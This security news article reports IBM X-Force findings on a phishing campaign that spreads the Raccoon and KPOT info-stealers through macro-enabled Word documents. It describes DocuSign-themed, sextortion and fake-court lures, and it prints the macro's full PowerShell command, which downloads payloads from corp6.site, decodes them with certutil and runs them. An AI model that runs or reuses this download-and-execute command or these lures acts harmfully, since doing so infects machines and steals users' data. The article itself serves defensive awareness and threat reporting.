Hackers Attack Windows Users with Info-Stealer Malware via Weaponized MS Word Documents

Researchers from X-Force uncovered a malicious campaign with Info-stealer called “Raccoon” and “KPOT” that targets the Windows Users via fake emails to steal sensitive data.

Raccoon malware believed to be originated from the Russian speaking hackers and it has actively attacked financial and government organizations last year with Fallout & RIG Exploit Kits.

Type of Attempts to infect the Windows Users

This malware campaign delivers the payload via email that contains a weaponized document which is signed using the DocuSign software, DocuSign is a company well known for enabling organizations to manage electronic documents.

Info-Stealer

Document subject is referred to as “files” or “paperwork” a tempt victims to open a file, and execute the payload in the victim’s windows machine.

Another sextortion fallout email sample that collected by the researchers has contains the following body content and claim themselves as “the Red Skull hacker crew”:

“Private info belonging to your friend has been stolen”, “Your colleague’s account was compromised” or “We have got access to your friend’s account”.

Also, the attacker sends an intimate picture of his girlfriend and threatened the person to distribute the picture to his complete contact list if the victims not paying the demanded ransom of 500 dollars.

A very recent sample that uncovered by the researchers from IBM X-Force, posing as an official “indictment message” sent by the court. This is supposed to frighten victims into believing that they are actually sued in court for something they do not know of. 

The body of the email urging the victims to examine and print out the documents and also giving a deadline for a response and explaining the consequences if the victims failed to open the malicious document.

Info-Stealer

These are the main attempts of tempting victims to open the attachment to executing the malware payload by the attacker.

Payload

Once open the malicious document, it keeps urging users to click the “Enable content ” that helps them to execute the macro on the Windows machine.

All emails contain exactly the same macro content. as soon as the macros are run, a PowerShell command is executed in the background.

powershell -windowstyle hidden Import-Module BitsTransfer; Start-BitsTransfer -Source http://corp6.site/IeuAje.dat,http://corp6.site/neaJk.dat,http://corp6.site/QpYe.dat -Destination "$env:TEMP\vido.com","$env:TEMP\sfera","$env:TEMP\QpYe.com"; Set-Location -Path "$env:TEMP"; certutil -decode sfera tref;  Start-Process vido.com -ArgumentList tref

The above command will download the Raccoon info stealer hosted on corp6[.]site.

In the recent campaign deliver the KPOT and another info-stealer via new hardcoded URLs.

It is worth mentioning, that we have seen info stealing malware distributed comparably on the domains corp5[.]site, corp6[.]site and now corp7[.]site. Researchers said.

Mitigation

1. Do not click or open links in emails directly, instead type in the main URL in your browser or search the brand/company via your preferred search engine.

2. Ensure anti-virus software and associated files are up to date.

3. Search for existing signs of the indicated IOCs in your environment.

4. Block all URL and IP based IOCs at the firewall, IDS, web gateways, routers or other perimeter-based devices, a course of action, resources or applications to remediate this threat.

5. Keep applications and operating systems running at the current released patch level.

IOC’s

40EB933C1538165C0E777BE5DCB38F91
7DD258C510A6B9EA4FBA30D4AFF0A9D4
B403F98DA4F2E15F9F3B516A589575C5

Leave a Reply